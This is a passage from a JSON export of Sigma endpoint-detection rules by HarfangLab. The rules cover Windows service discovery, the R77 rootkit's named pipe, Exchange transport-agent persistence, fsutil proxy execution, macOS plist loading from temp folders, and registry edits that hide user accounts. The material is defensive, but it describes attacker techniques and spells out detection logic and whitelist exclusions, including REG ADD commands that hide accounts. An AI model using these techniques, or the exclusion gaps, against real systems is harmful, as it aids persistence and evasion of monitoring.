"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605844Z",
"creation_date": "2026-03-23T11:45:34.605848Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605856Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/12/18/lets-opendir-some-presents-an-analysis-of-a-persistent-actors-activity/",
"https://attack.mitre.org/techniques/T1007/"
],
"name": "t1007_sc_query.yml",
"content": "title: System Service Discovered via sc.exe\nid: bfa22e53-0d1e-4743-9891-9cc61f48816f\ndescription: |\n Detects the execution of sc.exe with the 'query' argument.\n Adversaries can use this command during the discovery phase to list Windows services.\n It is recommended to analyze the parent process and execution context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://thedfirreport.com/2023/12/18/lets-opendir-some-presents-an-analysis-of-a-persistent-actors-activity/\n - https://attack.mitre.org/techniques/T1007/\ndate: 2022/11/14\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\sc.exe'\n # Renamed binaries\n - OriginalFileName: 'sc.exe'\n selection_cmdline:\n CommandLine|endswith: ' query'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_grangle:\n ParentImage: '?:\\GRANGLE\\appserver\\tomcat\\\\*\\bin\\tomcat9.exe'\n\n exclusion_vtom:\n GrandparentImage: '?:\\VTOM\\ABM\\BIN\\bdaemon.exe'\n\n # Trouble Shooting Script\n exclusion_tss:\n GrandparentCommandLine: '?:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command & ??:\\\\*\\TSS\\TSS.ps1? -CollectLog MCM_Report *-NewSession'\n\n # https://www.mipih.fr/\n exclusion_cariatides:\n CurrentDirectory: '?:\\CARIATIDES\\Batchs\\Exploitation\\'\n GrandparentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\taskeng.exe'\n - '?:\\Windows\\System32\\svchost.exe' # C:\\Windows\\system32\\svchost.exe -k netsvcs\n\n exclusion_trendmicro:\n ParentCommandLine|startswith:\n - '?:\\Windows\\system32\\cmd.exe /c startTMSM.bat ?:\\Program Files (x86)\\Trend Micro\\Apex One'\n - '?:\\Windows\\system32\\cmd.exe /c stopTMSM.bat ?:\\Program Files (x86)\\Trend Micro\\Apex One'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bfa22e53-0d1e-4743-9891-9cc61f48816f",
"rule_name": "System Service Discovered via sc.exe",
"rule_description": "Detects the execution of sc.exe with the 'query' argument.\nAdversaries can use this command during the discovery phase to list Windows services.\nIt is recommended to analyze the parent process and execution context as well as to correlate this alert with other discovery commands executed around it.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bfabd3f1-3818-4b6d-88d8-4d1e42ea105c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079922Z",
"creation_date": "2026-03-23T11:45:34.079924Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079929Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit",
"https://twitter.com/malmoeb/status/1523179260273254407",
"https://github.com/bytecode77/r77-rootkit",
"https://attack.mitre.org/techniques/T1014/"
],
"name": "t1014_r77_named_pipes_created.yml",
"content": "title: Named Pipe Created linked to R77 Rootkit\nid: bfabd3f1-3818-4b6d-88d8-4d1e42ea105c\ndescription: |\n Detects connection to a Named Pipe pertaining to the R77 ring3 rootkit.\n R77 is an open source userland rootkit that is being used to hide the presence of other software on a system by hooking multiple Windows APIs.\n It is recommended to investigate the process that created the named pipe to determine its legitimacy.\nreferences:\n - https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit\n - https://twitter.com/malmoeb/status/1523179260273254407\n - https://github.com/bytecode77/r77-rootkit\n - https://attack.mitre.org/techniques/T1014/\ndate: 2022/07/18\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1014\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Rootkit.R77\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: named_pipe_creation\n product: windows\ndetection:\n selection:\n PipeName: '\\$77control'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bfabd3f1-3818-4b6d-88d8-4d1e42ea105c",
"rule_name": "Named Pipe Created linked to R77 Rootkit",
"rule_description": "Detects connection to a Named Pipe pertaining to the R77 ring3 rootkit.\nR77 is an open source userland rootkit that is being used to hide the presence of other software on a system by hooking multiple Windows APIs.\nIt is recommended to investigate the process that created the named pipe to determine its legitimacy.\n",
"rule_creation_date": "2022-07-18",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c00b65da-0ebe-48ef-a6ac-e68f0dac4cc9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075693Z",
"creation_date": "2026-03-23T11:45:34.075695Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075700Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook",
"https://attack.mitre.org/techniques/T1505/002/"
],
"name": "t1505_002_edgetransport_spawning_dangerous_processes.yml",
"content": "title: Process Started by Microsoft Exchange EdgeTransport.exe\nid: c00b65da-0ebe-48ef-a6ac-e68f0dac4cc9\ndescription: |\n Detects a process being spawned by EdgeTransport.exe.\n Attackers can install malicious TransportAgents in an compromised Exchange server. If this malicious TransportAgent spawns processes, it will spawn them under EdgeTransport.exe.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to investigate the process started by EdgeTransport.exe to look for malicious content as well as the recent suspicious installation of new Exchange transport agents.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/08\nmodified: 2025/10/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1071.003\n - attack.t1104\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\EdgeTransport.exe'\n\n filter_edge:\n Image|endswith: '\\EdgeTransport.exe'\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_wermgr:\n Image: '?:\\Windows\\System32\\wermgr.exe'\n CommandLine|startswith: '?:\\Windows\\system32\\wermgr.exe -outproc '\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_oleconverter:\n OriginalFileName: 'OLECONVERTER.EXE'\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_rmactivate:\n OriginalFileName: 'rmactivate_ssp.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_crossware:\n Image: '?:\\Program Files\\CrosswareMailSignature\\esig.exe'\n\n exclusion_csc:\n Image: '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\csc.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c00b65da-0ebe-48ef-a6ac-e68f0dac4cc9",
"rule_name": "Process Started by Microsoft Exchange EdgeTransport.exe",
"rule_description": "Detects a process being spawned by EdgeTransport.exe.\nAttackers can install malicious TransportAgents in an compromised Exchange server. If this malicious TransportAgent spawns processes, it will spawn them under EdgeTransport.exe.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to investigate the process started by EdgeTransport.exe to look for malicious content as well as the recent suspicious installation of new Exchange transport agents.\n",
"rule_creation_date": "2022-11-08",
"rule_modified_date": "2025-10-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1071.003",
"attack.t1104",
"attack.t1114.002",
"attack.t1505.002",
"attack.t1546.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c0336133-51c0-4663-bf67-46f321345247",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086724Z",
"creation_date": "2026-03-23T11:45:34.086726Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086731Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Fsutil/",
"https://twitter.com/0gtweet/status/1720724516324704404",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_fsutil_proxy_execution.yml",
"content": "title: Proxy Execution via fsutil.exe\nid: c0336133-51c0-4663-bf67-46f321345247\ndescription: |\n Detects suspicious command-line arguments used with fsutil.exe, a legitimate filesystem management tool that can be abused by attackers to proxy execution of malicious payloads.\n Fsutil.exe is commonly used for legitimate filesystem operations, but its execution can be misused to execute pre-planted binaries or malicious commands.\n It is recommended to analyze both the parent process and the process stemming from fsutil.exe to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Fsutil/\n - https://twitter.com/0gtweet/status/1720724516324704404\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/11/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Fsutil\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n GrandparentImage|endswith: 'fsutil.exe'\n GrandparentCommandLine|contains: ' trace decode'\n Image|endswith: '\\netsh.exe'\n\n filter_netsh:\n OriginalFileName: 'netsh.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c0336133-51c0-4663-bf67-46f321345247",
"rule_name": "Proxy Execution via fsutil.exe",
"rule_description": "Detects suspicious command-line arguments used with fsutil.exe, a legitimate filesystem management tool that can be abused by attackers to proxy execution of malicious payloads.\nFsutil.exe is commonly used for legitimate filesystem operations, but its execution can be misused to execute pre-planted binaries or malicious commands.\nIt is recommended to analyze both the parent process and the process stemming from fsutil.exe to look for malicious content or actions.\n",
"rule_creation_date": "2023-11-14",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c0445b10-0789-4ae9-97f6-b85754b5bd8b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095124Z",
"creation_date": "2026-03-23T11:45:34.095126Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095130Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1569/001/"
],
"name": "t1569_001_plist_loaded_suspicious_folder.yml",
"content": "title: Plist File Loaded from Suspicious Location\nid: c0445b10-0789-4ae9-97f6-b85754b5bd8b\ndescription: |\n Detects a plist file being loaded using launchctl from a suspicious folder.\n Attackers can manually load plist files to create launch agents and achieve persistence.\n It is recommended to investigate the content of the plist file and the ancestors of the launchctl process to determine whether this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1569/001/\ndate: 2024/07/03\nmodified: 2025/03/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.ServiceCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/bin/launchctl'\n\n # Either from a different folder and using global paths\n # Matches 'launchctl load /tmp/com.fake.name.plist' etc.\n selection_commandline:\n CommandLine|re:\n - '(?i) load /tmp/[^/]+\\.plist'\n - '(?i) load /private/tmp/[^/]+\\.plist'\n - '(?i) load /var/[^/]+\\.plist'\n - '(?i) load /Users/Shared/[^/]+\\.plist'\n\n # Or from the folders themselves\n # Matches 'launchctl load ./com.fake.name.plist', or 'launchctl load com.fake.name.plist', etc. run from a suspicious folder\n selection_current_folder:\n CurrentDirectory:\n - '/tmp/'\n - '/private/tmp/'\n - '/var/'\n - '/Users/Shared/'\n CommandLine|re: '(?i) load (?:\\./)?[^/]+\\.plist'\n\n condition: selection and 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c0445b10-0789-4ae9-97f6-b85754b5bd8b",
"rule_name": "Plist File Loaded from Suspicious Location",
"rule_description": "Detects a plist file being loaded using launchctl from a suspicious folder.\nAttackers can manually load plist files to create launch agents and achieve persistence.\nIt is recommended to investigate the content of the plist file and the ancestors of the launchctl process to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-03-10",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c0445b7c-3f2f-473b-8737-4e9e2d8969f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620363Z",
"creation_date": "2026-03-23T11:45:34.620365Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620369Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://superuser.com/questions/618555/what-values-are-defined-for-the-specialaccounts-userlist-key-and-what-i-is-their",
"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://twitter.com/malmoeb/status/1496875024254640129",
"https://attack.mitre.org/techniques/T1564/002/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_winlogon_special_account_modification.yml",
"content": "title: User Account Hidden from User Lists\nid: c0445b7c-3f2f-473b-8737-4e9e2d8969f3\ndescription: |\n Detects the modification of the \"Winlogon\\SpecialAccounts\\UserList\" registry key.\n This may help an attacker hide an account from the welcome screen or control panel.\n The DWORD value 0 hides the user on the Welcome screen, but he is still visible in the Control Panel.\n The DWORD value 1 shows the user on the Welcome screen and Control Panel.\n The DWORD value 65536 hides the user from the Welcome screen and the Control Panel.\n It is recommended to analyze the process responsible for the registry modification as well as to determine the legitimacy of the user account added to the SpecialAccounts key.\nreferences:\n - https://superuser.com/questions/618555/what-values-are-defined-for-the-specialaccounts-userlist-key-and-what-i-is-their\n - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\n - https://twitter.com/malmoeb/status/1496875024254640129\n - https://attack.mitre.org/techniques/T1564/002/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2022/12/01\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith: 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\'\n\n filter_showuser:\n Details: 'DWORD (0x00000001)'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_lenovo:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\lenovo_tmp_????????'\n\n exclusion_zenworks_dau:\n ProcessImage: '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\DAUHelper.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\DAU?-*'\n\n exclusion_sysmex_ipu:\n ProcessImage: '?:\\Program Files (x86)\\Sysmex\\IPUSRV\\IpuSrv.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\IPU*'\n\n exclusion_novell:\n ProcessImage:\n - '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\DAUHelper.exe'\n - '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\ZenworksWindowsService.exe'\n\n exclusion_autoelevate_agent:\n ProcessImage:\n - '?:\\Program Files\\AutoElevate\\AutoElevateAgent.exe'\n - '?:\\Program Files (x86)\\AutoElevate\\AutoElevateAgent.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\~0000AEAdmin'\n\n exclusion_symex:\n ProcessOriginalFileName: 'IpuSrv.exe'\n ProcessCompany: 'Sysmex'\n\n exclusion_nomachine:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\nx'\n ProcessSigned: 'true'\n ProcessSignature: 'NoMachine S.a.r.l.'\n\n exclusion_citrix:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\CtxPkmService'\n\n exclusion_schneider:\n ProcessImage: '?:\\Windows\\Installer\\MSI????.tmp'\n ProcessSigned: 'true'\n ProcessSignature: 'SCHNEIDER ELECTRIC USA, INC.'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\SE-Account'\n\n exclusion_bmc:\n ProcessOriginalFileName: 'mtxagent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'BMC Software France SAS'\n\n exclusion_postgres:\n ProcessParentImage|endswith:\n - '\\edb_pgagent_pg??.exe'\n - ':\\Windows\\System32\\msiexec.exe'\n - '\\postgresql-*-windows-x64.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\postgres'\n\n exclusion_setup:\n ProcessOriginalFileName: 'InstallShield Setup.exe'\n ProcessCompany:\n - 'GE Healthcare'\n - 'InBody'\n\n exclusion_oracle:\n ProcessOriginalFileName: 'ServiceHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Oracle America, Inc.'\n\n exclusion_pulse:\n ProcessCommandLine: 'REG ADD HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList /v pulseuser /t REG_DWORD /d 0 /f'\n ProcessGrandparentCommandLine: '?:\\\\PROGRA~1\\\\Python3\\\\python.exe ?:\\Program Files\\\\Python3\\\\Lib\\\\site-packages\\\\pulse_xmpp_agent\\\\connectionagent.py -t machine'\n\n exclusion_philips:\n ProcessImage|endswith: '\\IntelliSpace Perinatal\\Setup\\setup.exe'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\OBTV Connect'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\OBTV Internal 2'\n\n exclusion_amada:\n ProcessParentCommandLine: '?:\\Program Files (x86)\\AMADA3i\\DCOM Server\\DCOMSetting.exe'\n\n exclusion_scanner:\n ProcessCommandLine:\n - 'reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList /v scanner /t REG_DWORD /d 00000000'\n - 'REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList /v scanner /t REG_DWORD /d 00000000 /f'\n - 'REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList /v copieur /t REG_DWORD /d 0'\n ProcessParentCommandLine: '?:\\windows\\System32\\cmd.exe /C ?:\\\\*.bat'\n ProcessGrandparentCommandLine: '?:\\WINDOWS\\Explorer.EXE'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c0445b7c-3f2f-473b-8737-4e9e2d8969f3",
"rule_name": "User Account Hidden from User Lists",
"rule_description": "Detects the modification of the \"Winlogon\\SpecialAccounts\\UserList\" registry key.\nThis may help an attacker hide an account from the welcome screen or control panel.\nThe DWORD value 0 hides the user on the Welcome screen, but he is still visible in the Control Panel.\nThe DWORD value 1 shows the user on the Welcome screen and Control Panel.\nThe DWORD value 65536 hides the user from the Welcome screen and the Control Panel.\nIt is recommended to analyze the process responsible for the registry modification as well as to determine the legitimacy of the user account added to the SpecialAccounts key.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1564.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c04bc942-714f-4a5c-ac7a-74f7e2982ad2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082065Z",
"creation_date": "2026-03-23T11:45:34.082067Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082071Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tracert.yml",
